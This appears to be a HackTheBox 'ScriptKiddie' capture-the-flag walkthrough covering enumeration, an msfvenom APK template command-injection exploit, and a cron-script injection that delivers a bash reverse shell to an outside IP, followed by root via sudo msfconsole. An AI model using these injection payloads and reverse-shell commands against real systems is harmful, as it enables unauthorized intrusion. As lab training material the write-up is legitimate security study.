Sign in

HackTheBox — ScriptKiddie Walkthrough

InfoCard

This article is about how I rooted the machine “ScriptKiddie” from HackTheBox.

Enumeration

nmap -sC -sV 10.10.10.226 -o nmap

-sC — Default script scan

-sV — Service/Version scan

-o — save the output

We have 2 open ports: 22, 5000.

Visit 10.10.10.226:5000.

Home Page

It’s a simple website, where we can use some pentesting tools.

Let’s fire up “gobuster” against it

gobuster dir -w /usr/share/dirb/wordlists/common.txt -x php,txt,html -u http://10.10.10.226:5000 -o gobuster

dir — scan for direcotires

-w — specify wordlist

-x — specify extensions

-u — specify url

-o — save output

We get nothing useful.

Getting a reverse shell

The default syntax for using “searchsploit” is - “searchsploit [parameter]”

We can try searching for “openssh; whoami”, so the executed command will be “searchsploit openssh; whoami”.

“whoami” will be executed after “searchsploit openssh”

We get the following message:

We can try using more characters, that might be useful, like “||”, “&&”, but all of them are blocked.

Let’s try to find exploits for detected services and versions.

searchsploit OpenSSH 8.2p1; searchsploit Werkzeug httpd 0.16.1

Nothing comes out.

Google “Werkzeug/0.16.1 exploit” and we find “Werkzeug Debug Shell Command Execution”

Let’s try it.

Fire up metasploit…

msfconsole

and follow the instructions

use exploit/multi/http/werkzeug_debug_rce

Set required options and run.

It doesn’t work.

Back to the home page, we can see that we’ve an option to upload a template file for windows, linux and android.

Let’s google “windows template file”, “linux template file”, “android template file”.

Nothing useful comes up.

Maybe we’re forgetting something, maybe a magic word!

Google “android template file exploit” and we find “Rapid7 Metasploit Framework msfvenom APK Template Command Injection”

Let’s start metasploit again and follow the instructions.

We generated a template file for android.

Now, let’s start the netcat listener on port 4444 and upload the template.

nc -lvnp 1234
choose android, template file and any ip

Click “generate”, wait few seconds and we get a reverse shell.

Stabilize the shell

python3 -c “import pty;pty.spawn(‘/bin/bash’);”

We get a shell as a user “kid”.

Go to kid’s home directory and grab the user’s flag,

Horizontal Privilege Escalation

sudo -l

We’re asked for a password, we don’t know it.

View cronjobs

cat /etc/cronta

Nothing useful here, either.

Going to /home directory we see that there’s another user “pwn”

In pwn’s home directory, we find bash script called “scanlosers.sh”

It’s owned and executed by “pwn”. If we could directly write into it and then execute it, we would be able to get a second reverse shell as a user “pwn”, but we don’t have neither write, nor execute permissions. We gotta find another way around.

Notice that “hackers” file mentioned in script.

It’s owned by us and we can write into it.

If we try to write something in it, it gets cleared instantly, so there’s some hidden jobs that makes it empty over and over again.

Maybe the same kind of hidden job executes “scanlosers.sh”. If that’s true, the problem of not having “execute” permission is solved, but we still have to somehow pass a reverse shell to it.

If we take a closer look at a “scanloser.sh”, we notice that it reads “hackers” file line by line and runs nmap against them. nmap is executed by /bin/sh.

If we write following line into a hackers file:

“echo “ ;/bin/bash -c ‘bash -i >& /dev/tcp/10.10.14.172/1234 0>&1’ #” >> hackers”

Executed command by script would be:

sh -c “nmap — top ports 10 -oN recon/;/bin/bash -c ‘bash -i >& /dev/tcp/10.10.14.172/1234 0>&1’ #…………………..”

“;” breaks the command.

/bin/bash -c — means that the command that follows it will be executed by “bash”

then we have a standard bash reverse shell(don't forget to change the IP and port)

#- means that everything after it is considered as a comment. it’s just plain text and won't’ be executed. It doesn’t matter what is written after it.

So, we get something, that works with a similar logic, as SQL injection.

Start a new netcat listener on a different port, the one that’s not currently being used by another process.

nc -lvnp 1234

write reverse shell into “hackers” file

echo “ ;/bin/bash -c ‘bash -i >& /dev/tcp/10.10.14.172/1234 0>&1’ #” >> hackers

As soon as we hit enter, we get a second reverse shell, as a user “pwn”

Horizontal Privilege Escalation

sudo -l

We can start Metasploit with root privileges(root), without using a password(NOPASSWD)

sudo /opt/metasploit-framework-6.0.9/msfconsole

Valuable lesson learned: MAGIC WORD MAKES IMPOSSIBLE POSSIBLE!